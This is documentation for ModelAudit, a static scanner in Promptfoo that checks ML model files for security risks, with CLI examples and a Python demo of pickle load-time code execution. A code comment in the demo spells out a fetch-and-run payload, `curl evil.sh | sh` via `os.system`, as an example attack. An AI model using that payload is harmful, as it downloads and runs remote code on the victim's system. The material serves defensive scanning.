# Model Scanning

## Overview
ModelAudit is a lightweight static security scanner for machine learning models, integrated into Promptfoo. It lets you quickly scan your AI/ML models for potential security risks before deploying them to production environments.

By invoking `promptfoo scan-model`, you can use ModelAudit's static security scanning capabilities.
## Purpose

AI/ML models can introduce security risks through:
- Malicious code embedded in pickled models
- Suspicious TensorFlow operations
- Potentially unsafe Keras Lambda layers
- Encoded payloads hidden in model structures
- Risky configurations in model architectures
ModelAudit helps identify these risks before models are deployed to production environments, ensuring a more secure AI pipeline.
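To see why pickled models in particular are dangerous, consider that Python's pickle format can execute arbitrary callables at load time via `__reduce__`. The sketch below (illustrative only, not ModelAudit's implementation) shows the mechanism and how a static scanner can detect it by inspecting pickle opcodes with the standard-library `pickletools` module, without ever calling `pickle.loads` on untrusted data. The class name and the benign `print` payload are stand-ins for a real attack.

```python
import pickle
import pickletools

# Illustrative: pickle runs arbitrary callables when a payload is loaded.
class MaliciousModel:
    def __reduce__(self):
        # A real attack might return (os.system, ("curl evil.sh | sh",));
        # a benign print is used here to show the mechanism safely.
        return (print, ("payload executed at load time",))

payload = pickle.dumps(MaliciousModel())

# A static scanner walks the opcode stream instead of deserializing.
# The REDUCE opcode marks a "call this function on load" instruction.
ops = [op.name for op, arg, pos in pickletools.genops(payload)]
print("REDUCE" in ops)  # → True: the opcode a scanner would flag
```

This is why scanning happens statically: the model file is analyzed as bytes, and suspicious opcodes or imported names are reported without the payload ever running.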
## Usage

### Basic Command Structure

```bash
promptfoo scan-model [OPTIONS] PATH...
```
### Examples

```bash
# Scan a single model file
promptfoo scan-model model.pkl

# Scan multiple models and directories
promptfoo scan-model model.pkl model2.h5 models_directory

# Export results to JSON
promptfoo scan-model model.pkl --format json --output results.json

# Add custom blacklist patterns
promptfoo scan-model model.pkl --blacklist "unsafe_model" --blacklist "malicious_net"
```
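To illustrate how blacklist patterns like those above could work, here is a minimal sketch of matching user-supplied patterns against names found inside a scanned model. This is an assumption about the general technique, not ModelAudit's actual matching logic; the model names are made up for the example.

```python
import re

# Hypothetical blacklist patterns, as passed via repeated --blacklist flags.
blacklist = ["unsafe_model", "malicious_net"]
patterns = [re.compile(p, re.IGNORECASE) for p in blacklist]

def flag_names(names):
    """Return the names that match any blacklist pattern."""
    return [n for n in names if any(p.search(n) for p in patterns)]

print(flag_names(["resnet50", "malicious_net_v2", "Unsafe_Model"]))
# → ['malicious_net_v2', 'Unsafe_Model']
```

Case-insensitive substring-style matching means a pattern like `malicious_net` also catches variants such as `malicious_net_v2`, which is typically what you want when blocking a family of known-bad model names.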